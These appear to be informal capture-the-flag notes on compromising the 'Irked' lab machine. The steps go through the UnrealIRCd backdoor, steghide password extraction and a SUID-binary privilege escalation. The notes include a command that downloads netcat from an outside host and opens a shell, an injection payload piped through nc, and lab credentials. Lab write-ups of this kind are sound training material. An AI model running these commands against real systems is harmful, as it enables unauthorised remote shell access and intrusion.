Irked No.20 10.129.1.108
Nmap Scan Result:
port 80 Enum:
manual
apache 2.4.10
Dead end here for now...
I'll do one more dir busting with gobuster
---
Full nmap scanning shows there's port 8067
it's looking up the host name?
Unreal3.2.8.1
https://www.infosecmatter.com/nmap-nse-library/?nse=irc-unrealircd-backdoor
nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='wget http://www.javaop.com/~ron/tmp/nc && chmod +x ./nc && ./nc -l -p 4444 -e /bin/sh' 10.129.1.108
echo "AB; ping -c 192.168.49.130" | nc 192.168.130.120 8067
tcpdump -i tun1 icmp -v
comfirmed that we can do command execution
Explanation: Sometimes, linux may not be in the bash mode, so we told the engine to go to the bash mode with "bash -c" before executing the command"
got a reverse shell:
found a djmardov directory.
do find . -ls -type f
shows only files in the current directory.
back up file.
Steg---steganography..
We only saw one picture, which was this img.
Extracting password from an img file with steghide
steghide extract -sf Desktop/irked.jpg -p UPupDOWNdownLRlrBAbaSSss
Kab6h+m+bbp2J:HG
I was able to ssh into the user with the pass found.
LinEnum.sh
wget -r http://10.10.16.13/LinEnum.sh > LinEnum.sh
./LinEnum.sh
Ran LinPeas.sh
Now let's transfer the file over to kali and analyze it.
base64 -w0 /usr/bin/viewuser this will encode the file into base64. -w0 eliminates line wrapping.
base64 textfile.txt --decode
use "ltrace" to analyze it.
executing /tmp/listusers
if we replace this file with a shell, we can get a root.
replaced the content with 👍
ran the viewuser app
Now we are in root
Last updated